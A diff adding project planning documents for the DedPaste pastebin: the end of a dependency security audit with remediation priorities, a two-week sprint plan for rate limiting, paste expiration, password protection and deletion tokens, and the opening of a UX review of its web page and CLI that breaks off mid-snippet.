+**Note:** The Sonatype MCP tools were rate-limited during this audit and could not return results. The following assessment is based on manual review of declared versions.
+
+| Package | Version | Risk Assessment |
+|---------|---------|----------------|
+| `openpgp` | ^6.2.2 | **Low Risk** -- Active, well-maintained crypto library. Current latest is 6.x. Ensure using latest 6.x patch. |
+| `marked` | ^16.2.0 | **Medium Risk** -- Markdown renderer. Historically has had XSS vulnerabilities. The `sanitize` option was removed in v2+. Must use external sanitization. |
+| `node-fetch` | ^3.3.2 | **Low Risk** -- Stable, maintained. Node 18+ has built-in `fetch`. Consider migrating to native fetch. |
+| `keybase-api` | ^0.0.1 | **High Risk** -- Version 0.0.1 suggests abandoned/prototype. Keybase service is essentially deprecated. |
+| `mixpanel` | ^0.18.1 | **Low Risk** -- Official Mixpanel SDK. Evaluate need for analytics in a privacy-focused tool. |
+| `commander` | ^13.1.0 | **Low Risk** -- Widely used, actively maintained CLI framework. |
+| `inquirer` | ^12.9.4 | **Low Risk** -- Actively maintained interactive prompt library. |
+| `highlight.js` | ^11.11.1 | **Low Risk** -- Actively maintained syntax highlighter. |
+| `uuid` | ^13.0.0 | **Low Risk** -- Simple UUID generation. |
+| `clipboardy` | ^4.0.0 | **Low Risk** -- Clipboard utility. |
+| `mime-types` | ^2.1.35 | **Low Risk** -- MIME type lookup. Stable. |
+| `eslint` | ^9.34.0 | **N/A** -- Should be devDependency only. |
+| `prettier` | ^3.6.2 | **N/A** -- Should be devDependency only. |
+| `@emotion/*`, `@mui/material` | Various | **Low Risk** -- Should be devDependencies (bundled at build). |
+| `wrangler` | ^4.60.0 | **Low Risk** -- Official Cloudflare tooling, dev only. |
+
+**Recommendation:** Run `npm audit` regularly and integrate it into CI/CD. Consider using `npm audit --production` to focus on runtime dependencies.
+
+---
+
+## Remediation Priority
+
+| Priority | Finding | Effort |
+|----------|---------|--------|
+| 1 (Immediate) | C1 - Insecure PRNG for paste IDs | Low |
+| 2 (Immediate) | C2 - Stored XSS via markdown | Medium |
+| 3 (This Sprint) | H1 - Missing security headers | Low |
+| 4 (This Sprint) | H2 - Overly permissive CORS | Low |
+| 5 (This Sprint) | H5 - No upload size limit | Low |
+| 6 (This Sprint) | H3 - Content-Disposition injection | Low |
+| 7 (Next Sprint) | C3 - No authentication | High |
+| 8 (Next Sprint) | H4 - Path traversal in key storage | Low |
+| 9 (Next Sprint) | H6 - RSA-2048 key size | Medium |
+| 10 (Next Sprint) | C4 - Hardcoded Mixpanel token | Low |
+| 11 (Backlog) | M1-M8 - Medium findings | Various |
+| 12 (Backlog) | L1-L6 - Low findings | Various |
+
+---
+
+## Positive Security Observations
+
+1. **Encryption design is sound**: The hybrid RSA+AES-256-GCM scheme with random symmetric keys and random IVs is correctly implemented. No IV/nonce reuse was detected.
+2. **escapeHtml function**: HTML escaping is properly implemented for user-controlled strings in non-markdown contexts.
+3. **Temp file permissions**: PGP temp files are created with mode `0o600` (owner-only read/write).
+4. **Resume state permissions**: Resume state directory uses mode `0o700`, files use `0o600`.
+5. **No `eval()` or `Function()` usage**: No dynamic code execution was found.
+6. **No prototype pollution vectors**: No direct `__proto__` or `constructor` manipulation detected.
+7. **OpenPGP.js v6**: Using a current, actively maintained version of the PGP library.
+8. **Proper OAEP padding**: RSA encryption correctly uses `RSA_PKCS1_OAEP_PADDING` rather than insecure PKCS1v1.5 padding.
+9. **Error messages are generally safe**: Most error responses return generic messages rather than stack traces.
+
+---
+
+*End of Security Audit Report*

--- a/.agents/SPRINT.md
+++ b/.agents/SPRINT.md
@@ -1,0 +1,444 @@
+# Sprint Plan: DedPaste Innovation Sprint
+
+**Sprint Duration**: 2 weeks
+**Sprint Goal**: Deliver high-impact innovative features that differentiate DedPaste, harden the security posture, and improve both CLI and web UX within the Cloudflare Workers architecture.
+**Created**: 2026-02-22
+**Team Lead**: Team Lead Agent
+
+---
+
+## Current State Assessment
+
+### What Exists
+- **Worker** (`src/index.ts`, ~2800 lines): Handles paste CRUD, one-time pastes, encrypted pastes, markdown rendering with syntax highlighting and Mermaid diagrams, web upload/text API, and multipart upload for large files (up to 5GB).
+- **CLI** (`cli/index.ts`, ~2000+ lines): Full-featured CLI with Commander.js, supporting paste/get, encryption (RSA+AES hybrid, PGP, Keybase, GitHub keys), interactive key management, group recipients, large file uploads with resume, progress display, analytics.
+- **Storage**: R2 for paste content, KV for metadata and upload sessions.
+- **Encryption**: Client-side E2E encryption with RSA+AES-256-GCM hybrid, PGP (via openpgp), Keybase and GitHub key fetching, key groups, streaming encryption for large files (v4 format).
+- **Web Interface**: MUI-styled homepage served from the worker with paste creation UI, markdown viewer with code highlighting.
+- **Tests**: Only 3 test files (encryption, friend-encryption, pgp-decryption) -- all focused on encryption. No worker tests, no CLI command tests, no integration tests.
+- **CI/CD**: auto-version-bump and release-with-sbom workflows. No test workflow, no security scanning.
+- **Types**: Comprehensive type definitions including service interfaces (IPasteService, IEncryptionService, etc.) but no actual service layer implementation.
+
+### What Is Missing (Biggest Gaps)
+1. **No rate limiting** -- RateLimitError class exists but nothing enforces it. The service is open to abuse.
+2. **No paste expiration** -- Pastes live forever unless they are one-time. No TTL-based cleanup.
+3. **No password protection** -- No way to add a password to a paste beyond encryption keys.
+4. **No API key/auth system** -- All endpoints are unauthenticated. No way to manage pastes after creation.
+5. **No service layer** -- All logic is in the monolithic `src/index.ts` handler function.
+6. **No test coverage** for the worker or CLI commands.
+7. **No health endpoint** -- No way to check if the service is up.
+8. **No OpenAPI spec** -- API is undocumented.
+9. **Web decryption is stubbed** -- `handleWebDecrypt` just redirects; browser-side decryption with key input is not implemented.
+10. **No paste deletion API** -- Once created, non-one-time pastes cannot be deleted by the creator.
+
+### Where the Biggest Innovation Opportunities Are
+1. **Paste Expiration with TTL** -- Simple, high-impact, uses existing R2/KV infrastructure.
+2. **Password-Protected Pastes** -- Differentiator: encryption without needing key management.
+3. **Rate Limiting via KV** -- Essential for production-readiness.
+4. **Paste Deletion Tokens** -- Give creators a delete token at creation time.
+5. **Web-Based Decryption** -- Let users decrypt pastes in-browser without the CLI.
+6. **Health + Info Endpoints** -- Low effort, high value for monitoring.
+7. **CLI Config File** -- Persistent user preferences for the CLI.
+
+---
+
+## Sprint Backlog
+
+### Track 1: Security Hardening (Security Agent)
+
+#### Task 1.1: Implement Rate Limiting
+**Priority**: P0
+**Assigned To**: Security Agent
+**Dependencies**: None
+**TODOs.md Reference**: Section 2.1 (Rate limiting)
+**Description**: Implement per-IP rate limiting using Cloudflare KV. The worker should track request counts per IP with a sliding window and return 429 responses when limits are exceeded. This is the single most important security gap -- without it, the service is trivially abusable.
+
+**Implementation approach**:
+- Use the existing `PASTE_METADATA` KV namespace (or create a new `RATE_LIMITS` namespace if preferred) to store counters keyed by hashed IP.
+- Define endpoint-specific limits:
+  - POST `/upload`, `/temp`, `/e/upload`, `/e/temp`: 30 requests per minute per IP.
+  - POST `/api/upload`, `/api/text`: 30 requests per minute per IP.
+  - POST `/upload/init` (multipart): 5 per minute per IP.
+  - GET `/{id}`: 120 requests per minute per IP.
+- Use the existing `RateLimitError` class from `src/types/index.ts`.
+- Return proper `Retry-After` headers on 429 responses.
+
+**Acceptance Criteria**:
+- [ ] Rate limit middleware function implemented in the worker
+- [ ] Per-IP limits enforced on all POST endpoints
+- [ ] GET endpoints have higher but still enforced limits
+- [ ] 429 responses include `Retry-After` header
+- [ ] Rate limit state stored in KV with TTL for auto-cleanup
+- [ ] Unit tests for the rate limiting logic
+- [ ] Does not break existing functionality
+
+**Risks**: KV eventual consistency may allow slight over-counting across edge locations. This is acceptable for a first implementation.
+
+---
+
+#### Task 1.2: Dependency Security Audit
+**Priority**: P0
+**Assigned To**: Security Agent
+**Dependencies**: None
+**TODOs.md Reference**: Section 5.2 (Dependency scanning)
+**Description**: Audit all direct and transitive dependencies using Sonatype MCP tools. The project has 18 direct dependencies and 7 dev dependencies. Key concerns: `openpgp`, `node-fetch`, `marked`, `highlight.js`, and `mixpanel`. Produce a report of vulnerabilities, license risks, and recommended version updates.
+
+**Acceptance Criteria**:
+- [ ] All dependencies scanned with Sonatype MCP tools
+- [ ] Vulnerability report produced with severity ratings
+- [ ] Recommended version updates documented
+- [ ] Any critical/high vulnerabilities have remediation plan
+- [ ] License compatibility confirmed for all dependencies
+
+**Risks**: Upgrading major versions could break API compatibility. Changes should be tested before committing.
+
+---
+
+#### Task 1.3: HTTP Security Headers Audit & Hardening
+**Priority**: P1
+**Assigned To**: Security Agent
+**Dependencies**: None
+**TODOs.md Reference**: Section 2.3 (Content Security)
+**Description**: The current worker responses use `Access-Control-Allow-Origin: *` everywhere and lack CSP, X-Frame-Options, and other security headers. Audit all response headers and add a centralized header-setting function.
+
+**Implementation approach**:
+- Create a `securityHeaders()` utility function that returns a base set of secure headers.
+- Add `Content-Security-Policy` for the HTML pages (homepage, markdown viewer).
+- Add `X-Content-Type-Options: nosniff` to all responses.
+- Add `X-Frame-Options: DENY` to HTML responses.
+- Tighten CORS to specific origins where possible (configurable via wrangler.toml env vars).
+- Ensure `Strict-Transport-Security` is set on all responses.
+
+**Acceptance Criteria**:
+- [ ] All HTML responses include CSP, X-Frame-Options, HSTS headers
+- [ ] All responses include X-Content-Type-Options: nosniff
+- [ ] CORS is configurable rather than wildcard `*`
+- [ ] Security headers applied via centralized utility function
+- [ ] No regression in existing functionality
+
+**Risks**: Overly restrictive CSP could break the MUI-styled homepage JavaScript. Test thoroughly.
+
+---
+
+### Track 2: UX & Design Improvements (Design Agent)
+
+#### Task 2.1: Web-Based Paste Creation Overhaul
+**Priority**: P1
+**Assigned To**: Design Agent
+**Dependencies**: None
+**TODOs.md Reference**: Section 7.1 (Modern UI redesign)
+**Description**: The current homepage (served from `src/muiStyles.ts`) shows documentation and examples but the actual paste creation experience via the web is minimal -- the `/api/upload` and `/api/text` endpoints exist but there is no rich paste creation form on the homepage. Design and implement an inline paste creation form with:
+- Text area with syntax highlighting preview
+- File drag-and-drop upload zone
+- Toggle for one-time paste
+- Toggle for password protection (feeds into Task 3.2)
+- Expiration time selector (feeds into Task 3.1)
+- Copy-to-clipboard for the resulting URL
+
+**Implementation approach**:
+- Modify `src/muiStyles.ts` to add a paste creation section to the homepage HTML.
+- Use vanilla JavaScript (no framework -- this is a Cloudflare Worker serving HTML).
+- Style with the existing MUI CSS variables for consistency.
+- The form should POST to `/api/text` or `/api/upload` and display the resulting URL inline.
+
+**Acceptance Criteria**:
+- [ ] Homepage includes a functional paste creation form above the documentation
+- [ ] Text paste creation works with a text area input
+- [ ] File upload works with drag-and-drop and file picker
+- [ ] One-time toggle works and is visually clear
+- [ ] Expiration selector present (even if backend support comes from Task 3.1)
+- [ ] Result URL displayed with one-click copy
+- [ ] Responsive design works on mobile
+- [ ] Accessible: keyboard navigable, proper labels, sufficient contrast
+
+**Risks**: Adding too much JavaScript to the worker-served HTML could impact load times. Keep it lightweight.
+
+---
+
+#### Task 2.2: Paste Viewer Enhancement
+**Priority**: P1
+**Assigned To**: Design Agent
+**Dependencies**: None
+**TODOs.md Reference**: Section 7.1 (Web Interface)
+**Description**: When a user views a paste via the web (non-markdown), they currently get raw content with headers. Design a proper paste viewer page that wraps the content in the DedPaste chrome (header, footer) with:
+- Syntax highlighting for code pastes (using the already-imported highlight.js)
+- Line numbers
+- Copy-to-clipboard button
+- Raw download link
+- Metadata display (creation date, content type, one-time indicator, expiration if applicable)
+- For encrypted pastes: a key input field for browser-side decryption (connects to the stubbed `handleWebDecrypt`)
+
+**Implementation approach**:
+- For text content types (`text/*`, `application/json`, `application/javascript`), render an HTML page with syntax highlighting instead of serving raw content.
+- Add a `?raw=true` parameter (already partially implemented) to bypass the viewer.
+- CLI requests (detected by User-Agent or Accept header) should still get raw content for backward compatibility.
+
+**Acceptance Criteria**:
+- [ ] Text pastes viewed in browser display in a styled viewer with syntax highlighting
+- [ ] Line numbers displayed alongside code
+- [ ] Copy-to-clipboard and raw download buttons present
+- [ ] Paste metadata displayed (creation time, type, filename)
+- [ ] CLI and curl requests still receive raw content (no breaking change)
+- [ ] Encrypted paste viewer shows decryption key input field
+- [ ] One-time paste warning banner displayed before content
+
+**Risks**: Detecting CLI vs browser reliably can be tricky. Use Accept header (`text/html` preference) as the primary signal.
+
+---
+
+#### Task 2.3: CLI Error Messages & Help Text Audit
+**Priority**: P2
+**Assigned To**: Design Agent
+**Dependencies**: None
+**TODOs.md Reference**: Section 7.2 (Interactive improvements)
+**Description**: Audit all error messages and help text in the CLI for clarity, actionability, and consistency. Ensure every error message tells the user: (1) what happened, (2) why, and (3) what to do about it. Review `cli/logger.ts` for message formatting consistency.
+
+**Acceptance Criteria**:
+- [ ] All error messages follow the "what/why/what-to-do" pattern
+- [ ] Help text for every command is complete and includes examples
+- [ ] No raw stack traces displayed in normal (non-debug) mode
+- [ ] Consistent use of colors and formatting across all CLI output
+- [ ] Exit codes are documented and consistent (0 = success, 1 = error, 2 = usage error)
+
+**Risks**: Low risk. This is a polish task with no functional changes.
+
+---
+
+### Track 3: Feature Development (Feature Dev Agent)
+
+#### Task 3.1: Paste Expiration (TTL) System
+**Priority**: P0
+**Assigned To**: Feature Dev Agent
+**Dependencies**: None
+**TODOs.md Reference**: Section 4.1 (Automatic cleanup)
+**Description**: This is the highest-impact feature missing from DedPaste. Currently, non-one-time pastes live forever. Implement a TTL system that allows pastes to expire after a configurable duration.
+
+**Implementation approach -- Worker side** (`src/index.ts`):
+- Extend the `PasteMetadata` type to include `expiresAt?: number` (Unix timestamp in ms).
+- Accept an `X-Expires-In` header on upload endpoints with values like `1h`, `1d`, `7d`, `30d`, `never`.
+- Accept an `expiresIn` field in the `/api/text` and `/api/upload` JSON/form body.
+- On paste retrieval, check `expiresAt` against `Date.now()`. If expired, delete the paste from R2 and return 404 with "This paste has expired."
+- Store expiration in KV metadata for efficient lookup.
+- Add a scheduled handler (Cloudflare Cron Trigger) to periodically clean up expired pastes from R2.
+
+**Implementation approach -- CLI side** (`cli/index.ts`):
+- Add `--expires <duration>` flag to the default command and `send` command.
+- Parse durations like `1h`, `6h`, `1d`, `7d`, `30d`.
+- Send the parsed duration as `X-Expires-In` header.
+- Display expiration info in the paste URL output.
+
+**Acceptance Criteria**:
+- [ ] Pastes can be created with an expiration time via CLI (`--expires`) and API (`X-Expires-In` header)
+- [ ] Expired pastes return 404 with "This paste has expired" message
+- [ ] Expiration metadata stored in R2 custom metadata
+- [ ] Web upload form supports expiration selection (when Task 2.1 is complete)
+- [ ] Default expiration is "never" (backward compatible)
+- [ ] CLI `--expires` flag accepts human-readable durations: `1h`, `6h`, `1d`, `7d`, `30d`
+- [ ] Scheduled cleanup handler removes expired pastes from R2 (cron trigger)
+- [ ] Unit tests for expiration logic and duration parsing
+- [ ] Existing pastes without expiration continue to work forever
+
+**Risks**: Cloudflare Cron Triggers have a minimum interval of 1 minute. Expired pastes may be accessible for up to 1 minute after expiry. The on-access check mitigates this.
+
+---
+
+#### Task 3.2: Password-Protected Pastes
+**Priority**: P1
+**Assigned To**: Feature Dev Agent
+**Dependencies**: Task 1.3 (Security headers -- should be done first or in parallel)
+**TODOs.md Reference**: Section 2.3 (Password protection layer)
+**Description**: Allow users to add a password to a paste without requiring PGP key management. This is a major differentiator -- most pastebins either have no encryption or require complex key setups. Password protection provides a middle ground: easy to use, still secure.
+
+**Implementation approach -- Worker side**:
+- When a paste is created with a password, the CLI/web client derives an AES-256 key from the password using PBKDF2 (100,000 iterations, SHA-256, random 16-byte salt).
+- The content is encrypted client-side with AES-256-GCM.
+- The salt is stored in paste metadata (it is not secret).
+- On retrieval, the worker returns the encrypted content with a header `X-Password-Protected: true` and the salt in `X-Password-Salt`.
+- The CLI or web client prompts for the password, derives the key, and decrypts.
+- Use a new URL prefix `/p/` to distinguish password-protected pastes (similar to `/e/` for encrypted).
+
+**Implementation approach -- CLI side**:
+- Add `--password` flag to create a password-protected paste.
+- Prompt for password interactively if `--password` is used without a value.
+- On `get`, detect `X-Password-Protected` header and prompt for password.
+
+**Implementation approach -- Web side**:
+- On the paste viewer page, if `X-Password-Protected` is true, show a password input form.
+- Derive the key in-browser using the Web Crypto API (`crypto.subtle.importKey` + `deriveKey`).
+- Decrypt and display the content.
+
+**Acceptance Criteria**:
+- [ ] Pastes can be created with `--password` flag (CLI) or password field (web)
+- [ ] Password derivation uses PBKDF2 with 100k iterations and random salt
+- [ ] Encryption is AES-256-GCM (client-side)
+- [ ] Salt stored in paste metadata, password never sent to server
+- [ ] CLI prompts for password on retrieval of password-protected pastes
+- [ ] Web viewer shows password input form for protected pastes
+- [ ] Web decryption works entirely client-side using Web Crypto API
+- [ ] Unit tests for PBKDF2 derivation and AES-GCM encrypt/decrypt
+- [ ] Password strength validation (minimum 8 characters)
+
+**Risks**: PBKDF2 with 100k iterations may be slow on low-power devices. This is a security/UX tradeoff that should be documented. The Web Crypto API is available in all modern browsers.
+
+---
+
+#### Task 3.3: Paste Deletion Tokens
+**Priority**: P1
+**Assigned To**: Feature Dev Agent
+**Dependencies**: None
+**TODOs.md Reference**: Section 3.1 (Paste Management)
+**Description**: Currently, non-one-time pastes cannot be deleted by their creator. Implement a deletion token system: when a paste is created, generate a random deletion token, return it to the creator alongside the URL, and provide a DELETE endpoint that accepts the token.
+
+**Implementation approach**:
+- On paste creation, generate a 32-character random token.
+- Store the token hash (SHA-256) in the paste's KV metadata.
+- Return the deletion token to the creator in a `X-Delete-Token` header and in the response body (for API uploads, include it in the JSON response).
+- Add a `DELETE /{id}` endpoint that requires the deletion token in `Authorization: Bearer <token>` or `X-Delete-Token` header.
+- Verify by hashing the provided token and comparing to the stored hash.
+- CLI: display the deletion token after paste creation, and add a `dedpaste delete <url-or-id> --token <token>` command.
+
+**Acceptance Criteria**:
+- [ ] Deletion token generated and returned on paste creation
+- [ ] Token hash stored in KV metadata (not the raw token)
+- [ ] DELETE endpoint validates token and removes paste from R2
+- [ ] CLI displays deletion token after creation
+- [ ] CLI `delete` command added with `--token` flag
+- [ ] Invalid tokens return 403 Forbidden
+- [ ] Missing tokens return 401 Unauthorized
+- [ ] Deletion of one-time pastes also works
+- [ ] Unit tests for token generation, hashing, and validation
+
+**Risks**: Users may lose their deletion tokens. This is by design -- the token is the only way to prove ownership without an auth system.
+
+---
+
+#### Task 3.4: Health & Info API Endpoints
+**Priority**: P1
+**Assigned To**: Feature Dev Agent
+**Dependencies**: None
+**TODOs.md Reference**: Section 8.2 (Health checks)
+**Description**: Add `/api/health` and `/api/info` endpoints for monitoring and discovery.
+
+**Implementation approach**:
+- `GET /api/health`: Returns `{ "status": "ok", "timestamp": "..." }` with a 200 status. Optionally checks R2 and KV connectivity.
+- `GET /api/info`: Returns `{ "version": "1.23.2", "features": ["encryption", "one-time", "multipart", "password-protection", "expiration"], "limits": { "maxFileSize": "5GB", "maxPasteSize": "100MB" } }`.
+
+**Acceptance Criteria**:
+- [ ] `GET /api/health` returns 200 with status and timestamp
+- [ ] `GET /api/info` returns version, feature list, and limits
+- [ ] Health check verifies R2 and KV connectivity (optional, with timeout)
+- [ ] Response times for health check are under 50ms
+- [ ] No sensitive information exposed in either endpoint
+
+**Risks**: None. Low-complexity task.
+
+---
+
+#### Task 3.5: CLI Configuration File Support
+**Priority**: P2
+**Assigned To**: Feature Dev Agent
+**Dependencies**: None
+**TODOs.md Reference**: Section 7.2 (Configuration file support)
+**Description**: Allow users to set persistent configuration via a `~/.dedpaste/config.json` file. This avoids repeating flags like `--encrypt`, custom API URLs, or preferred expiration times.
+
+**Implementation approach**:
+- Define configuration schema in `src/types/index.ts` (the `DedPasteConfig` interface already exists).
+- Load config from `~/.dedpaste/config.json` on CLI startup.
+- CLI flags override config file values (flags take precedence).
+- Add `dedpaste config` command to view/set config values interactively.
+- Add `dedpaste config set <key> <value>` and `dedpaste config get <key>`.
+
+Supported config keys:
+- `apiUrl` -- Custom API URL (default: `https://paste.d3d.dev`)
+- `defaultExpiry` -- Default expiration (e.g., `7d`)
+- `defaultEncrypt` -- Always encrypt by default (boolean)
+- `copyToClipboard` -- Auto-copy URL to clipboard (boolean)
+- `theme` -- CLI color theme
+
+**Acceptance Criteria**:
+- [ ] Config file loaded from `~/.dedpaste/config.json`
+- [ ] CLI flags override config file values
+- [ ] `dedpaste config` command works for viewing and setting values
+- [ ] Config schema validated on load (invalid values produce clear warnings)
+- [ ] Default values used when no config file exists
+- [ ] Config migration path if schema changes in future versions
+
+**Risks**: Need to handle corrupt config files gracefully. Schema validation should warn, not crash.
+
+---
+
+## Sprint Priority Order & Dependencies
+
+```
+Week 1 (Parallel Tracks):
+  Security:   [1.1 Rate Limiting] ------> [1.2 Dep Audit] ------> [1.3 Headers]
+  Design:     [2.1 Web Paste Form] -----> [2.2 Paste Viewer] ---->
+  Feature:    [3.1 Expiration/TTL] -----> [3.3 Delete Tokens] --->
+
+Week 2 (Parallel Tracks):
+  Security:   [1.3 Headers cont'd] ----> [Review 3.2 crypto]
+  Design:     [2.2 Viewer cont'd] ------> [2.3 CLI Error Audit]
+  Feature:    [3.2 Password Protect] ---> [3.4 Health API] -------> [3.5 Config File]
+```
+
+### Critical Path
+The critical path is: **Task 3.1 (Expiration)** and **Task 1.1 (Rate Limiting)** -- these must be completed first as they are P0 and represent the most significant gaps in the service.
+
+### Cross-Agent Dependencies
+| Task | Requires Review By | Before Shipping |
+|------|--------------------|-----------------|
+| 3.1 Expiration | Security Agent (metadata integrity) | Yes |
+| 3.2 Password Protection | Security Agent (PBKDF2 params, AES-GCM usage) | Yes, mandatory |
+| 3.3 Delete Tokens | Security Agent (token generation, hashing) | Yes, mandatory |
+| 2.1 Web Paste Form | Feature Dev (API integration) | After API changes land |
+| 2.2 Paste Viewer | Security Agent (XSS prevention in content display) | Yes |
+| 1.1 Rate Limiting | Feature Dev (integration into request handler) | Coordinated merge |
+
+---
+
+## Definition of Done (All Tasks)
+
+Every task is considered done when:
+1. Code is written following `CLAUDE.md` conventions (2-space indent, camelCase, types everywhere)
+2. `npm run build` passes without errors
+3. `npm run lint` passes without warnings
+4. `npm run format` has been run
+5. Unit tests are written and passing for new functionality
+6. No `any` types introduced without justification
+7. Security-sensitive changes reviewed by Security Agent
+8. User-facing changes reviewed by Design Agent
+9. Changes work within Cloudflare Workers constraints (no Node.js APIs in worker code)
+10. Backward compatibility maintained for existing CLI commands and API endpoints
+
+---
+
+## What We Are NOT Doing This Sprint
+
+To avoid scope creep, the following are explicitly out of scope:
+- **Full authentication system** (Section 2.1) -- Too large; rate limiting provides the immediate protection needed.
+- **Collaborative editing** (Section 3.2) -- Requires WebSocket/Durable Objects, which is a major architecture change.
+- **Service layer refactor** (Section 1.2) -- Important but not user-facing; defer to next sprint.
+- **Browser extension / IDE plugins** (Section 3.3) -- Downstream of a stable API; premature now.
+- **Mobile app** (Section 9.1) -- P3, not yet warranted.
+- **Multi-region deployment** (Section 10.1) -- Cloudflare Workers are already global.
+- **Database migration system** (Section 4.1) -- Not needed with R2/KV; applicable if we add D1 later.
+
+---
+
+## Success Metrics for This Sprint
+
+| Metric | Target |
+|--------|--------|
+| Rate limiting deployed | Yes/No |
+| Paste expiration functional | Yes/No |
+| Password-protected pastes working | Yes/No |
+| Deletion tokens working | Yes/No |
+| Web paste creation form live | Yes/No |
+| New test files added | >= 4 new test files |
+| Security vulnerabilities found and addressed | All critical/high |
+| CLI `--expires`, `--password`, `delete` commands | All functional |
+| Health endpoint responding | Yes/No |
+
+---
+
+*Sprint plan authored by Team Lead Agent. Last updated: 2026-02-22.*

--- a/.agents/UX-REVIEW.md
+++ b/.agents/UX-REVIEW.md
@@ -1,0 +1,580 @@
+# DedPaste UX Review & Improvement Proposals
+
+**Review Date:** 2026-02-22
+**Reviewer:** Design & User Experience Agent
+**Scope:** CLI, Web Interface, Documentation, Accessibility
+
+---
+
+## Table of Contents
+
+1. [Executive Summary](#executive-summary)
+2. [Web Interface Assessment](#web-interface-assessment)
+3. [CLI Assessment](#cli-assessment)
+4. [Documentation Assessment](#documentation-assessment)
+5. [Accessibility Findings](#accessibility-findings)
+6. [Quick Wins](#quick-wins)
+7. [Larger Initiatives](#larger-initiatives)
+8. [Prioritized Recommendations](#prioritized-recommendations)
+
+---
+
+## Executive Summary
+
+DedPaste is a feature-rich, security-focused pastebin with a powerful CLI and a web-based landing page. The application has grown organically, adding PGP, Keybase, GitHub key integration, groups, and large-file multipart uploads over time. This growth has introduced several UX inconsistencies and gaps that can be addressed to significantly improve usability.
+
+**Key Themes:**
+- The web interface has orphaned JavaScript (upload form UI elements are missing from the HTML)
+- The CLI has excellent help text but inconsistent output patterns and duplicated code paths between the default command and the `send` command
+- Shell completions are stale and do not cover newer features (PGP, Keybase, GitHub, groups, completion command itself)
+- Accessibility is minimal -- the web interface lacks ARIA attributes, focus management, and skip navigation
+- Error messages are generally helpful but inconsistent in format (some use emoji, some do not; some provide next steps, some do not)
+- The footer version is hardcoded and stale (displays 1.13.2 vs actual 1.23.2)
+
+---
+
+## Web Interface Assessment
+
+### Current State
+
+The homepage uses a custom MUI-inspired CSS framework (`src/muiStyles.ts`) with dark theme only. It consists of:
+- An AppBar with logo, GitHub link, and Install button
+- A hero section with feature cards
+- Installation instructions
+- Quick Start code examples
+- Troubleshooting section
+- API usage section
+- A footer
+
+### Issues Found
+
+#### CRITICAL: Orphaned Upload Form JavaScript
+
+**File:** `/home/cam/workspace/github.com/anoncam/dedpaste/src/muiStyles.ts` lines 1231-1427
+
+The homepage HTML includes extensive JavaScript that references DOM elements which do not exist in the rendered HTML:
+- `document.getElementById('dropZone')` -- no element with id `dropZone`
+- `document.getElementById('fileInput')` -- no element with id `fileInput`
+- `document.getElementById('tab-upload')` / `document.getElementById('tab-text')` -- no tab elements
+- `document.getElementById('textContent')` -- no textarea
+- `document.getElementById('resultContainer')` -- no result container
+- `document.getElementById('oneTime')` / `document.getElementById('textOneTime')` -- no checkboxes
+- `document.getElementById('fileName')` / `document.getElementById('fileSize')` -- no file info display
+
+**Problem:** The JavaScript for an upload/text-sharing form is present, but the corresponding HTML form elements are completely absent. This means there is dead code being shipped to every visitor, and the web interface has no functional paste-creation capability.
+
+**Impact:** Users visiting the homepage cannot create pastes through the web interface at all. The site is effectively a static landing page, not a functional tool.
+
+#### Stale Version in Footer
+
+**File:** `/home/cam/workspace/github.com/anoncam/dedpaste/src/muiStyles.ts` line 1446
+
+```
+Version 1.13.2
+```
+
+The actual version in `package.json` is `1.23.2`. This is a 10-version gap. The copyright also says 2024.
+
+**Proposed Fix:** Make the version dynamic by passing it from the worker or reading from a constant.
+
+#### Dark-Theme Only
+
+**File:** `/home/cam/workspace/github.com/anoncam/dedpaste/src/muiStyles.ts` lines 14-56
+
+The CSS only defines dark theme variables. There is no `prefers-color-scheme` media query or theme toggle. While dark theme is appropriate for developer tools, offering no alternative excludes users in bright environments or those who prefer light themes.
+
+#### External Font Loading Without Fallback Period
+
+**File:** `/home/cam/workspace/github.com/anoncam/dedpaste/src/muiStyles.ts` line 12
+
+```css
+@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500;700&family=Roboto+Mono:wght@400;500&display=swap');
+```
+
+Using `@import` inside a `<style>` tag blocks rendering until the font loads. The `display=swap` parameter in the Google Fonts URL helps, but the `@import` itself is render-blocking. This should be a `<link>` in the `<head>`.
+
+#### No Paste View Form for Web Users
+
+There is no way for a web user to create a paste directly from the browser. The homepage is entirely informational. The JavaScript for upload/text sharing exists but has no corresponding HTML. This is the single biggest UX gap for web visitors.
+
+#### Inline Styles Overuse
+
+**File:** `/home/cam/workspace/github.com/anoncam/dedpaste/src/muiStyles.ts` lines 870-984
+
+The feature cards use extensive `onmouseover`/`onmouseout` inline event handlers and inline `style` attributes. This creates maintenance issues and prevents CSS-only hover effects:
+
+```html
+onmouseover="this.style.transform='translateY(-4px)'; this.style.boxShadow='var(--mui-shadows-4)';"
+onmouseout="this.style.transform='translateY(0)'; this.style.boxShadow='var(--mui-shadows-3)';"
+```
+
+**Proposed Fix:** Move hover effects to CSS classes:
+```css
+.MuiCard:hover {
+  transform: translateY(-4px);
+  box-shadow: var(--mui-shadows-4);
+}
+```
+
+#### `document.execCommand('copy')` is Deprecated
+
+**File:** `/home/cam/workspace/github.com/anoncam/dedpaste/src/muiStyles.ts` line 1418
+
+```js
+document.execCommand('copy');
+```
+
+This API is deprecated. Modern browsers support `navigator.clipboard.writeText()`.
+
+---
+
+## CLI Assessment
+
+### Current State
+
+The CLI is built with Commander.js and provides five command modes: default (pipe-based), `keys`, `keys:enhanced`, `send`, `get`, and `completion`. It has rich help text, PGP/Keybase/GitHub integration, and both standard and enhanced interactive modes.
+
+### Issues Found
+
+#### Duplicated Logic Between Default Command and `send` Command
+
+**File:** `/home/cam/workspace/github.com/anoncam/dedpaste/cli/index.ts`
+
+The default command (line 1934+) and the `send` command (line 1111+) share nearly identical code paths for:
+- Reading from stdin/file
+- Encryption handling
+- PGP flag detection workarounds
+- File option parsing workarounds
+- API upload
+- Clipboard handling
+- Result output formatting
+
+This duplication means bug fixes or UX improvements must be applied in two places. It also creates subtle differences -- for example:
+
+- The `DefaultOptions.for` type is `string` (line 208) while `SendOptions.for` is `string[]` (line 162), meaning multi-recipient support only works with the `send` command
+- The default command does not support `--list-friends`, `--chunk-size`, `--resume`, or `--list-uploads`
+
+**Proposed Fix:** Extract shared upload logic into a single function used by both command handlers.
+
+#### Manual `process.argv` Parsing Workarounds
+
+**File:** `/home/cam/workspace/github.com/anoncam/dedpaste/cli/index.ts` lines 1176, 1302-1312, 1315-1317, 1348, 2027, 2030-2050, 2053-2056
+
+There are numerous instances of manually checking `process.argv` to detect flags that Commander.js should be handling:
+
+```typescript
+// Line 1176
+if (!options.temp && (process.argv.includes('--temp') || process.argv.includes('-t'))) {
